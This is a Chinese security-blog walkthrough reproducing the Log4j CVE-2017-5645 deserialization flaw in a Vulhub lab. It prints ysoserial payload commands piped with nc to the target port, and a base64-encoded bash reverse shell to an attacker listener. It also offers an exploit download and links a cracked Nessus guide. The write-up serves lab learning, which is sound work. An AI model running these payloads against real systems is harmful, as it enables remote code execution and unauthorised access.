漏洞复现——CVE-2017-5645
2022-11-8 09:2:18 Author: 浪飒sec(查看原文) 阅读量:42 收藏

免责声明

本公众号所发布的文章及工具只限交流学习,本公众号不承担任何责任!如有侵权,请告知我们立即删除。

漏洞概述

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

环境搭建

Vulhub搭建参考如下:

Vulnhub 靶场环境搭建

进入到vulbub靶场的/vulhub/log4j/CVE-2017-5645目录

使用命令:docker-compose up -d #启动镜像,整个过程比较久,耐心等待

测试连通性

进入容器

docker-compose exec log4j bashls /tmp 查看当前文件情况,用于后续确认远程命令执行是否执行成功

生成payload进行攻击

使用ysoserial生成payload,然后直接发送给192.168.0.140:4712

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/success" | nc.exe 192.168.0.140 4712

通过docker命令行可以看到生成了success文件夹

开启监听

nc.exe -lvvp 9999
将 /bin/bash -i >& /dev/tcp/192.168.0.1/9999 0>&1 进行base64编码L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMC4xLzk5OTkgMD4mMQ==

反弹shell

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "bash -c {echo,L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMC4xLzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}" | nc.exe 192.168.0.140 471

沉住气,不要急!!!

得到反弹shell,success

获取exp

关注浪飒sec回复221108获取exp下载地址

历史推荐

工具推荐——三个Burp插件

AK4安全工具集装箱V1.0.1正式发布

哈希碰撞与生日攻击

Ubuntu 20.04 离线安装破解 Nessus 10.3.0

浅析《数据安全法》与《个人信息保护法》对各行业的影响

内网渗透 域渗透

域环境基础知识

企业安全必看书籍(文末附地址)

超全Hack报告/资料/文档/书籍(不关注我你必后悔的好东西)

应急响应指南


文章来源: http://mp.weixin.qq.com/s?__biz=MzI1ODM1MjUxMQ==&mid=2247489867&idx=1&sn=580db6a637e8ef3523d9caabf8fbb5a3&chksm=ea082d5bdd7fa44d7a47c359be95898c7014eeddc677521941e4ca3b8f1efcb5b4ee1ddb7079#rd
如有侵权请联系:admin#unsafe.sh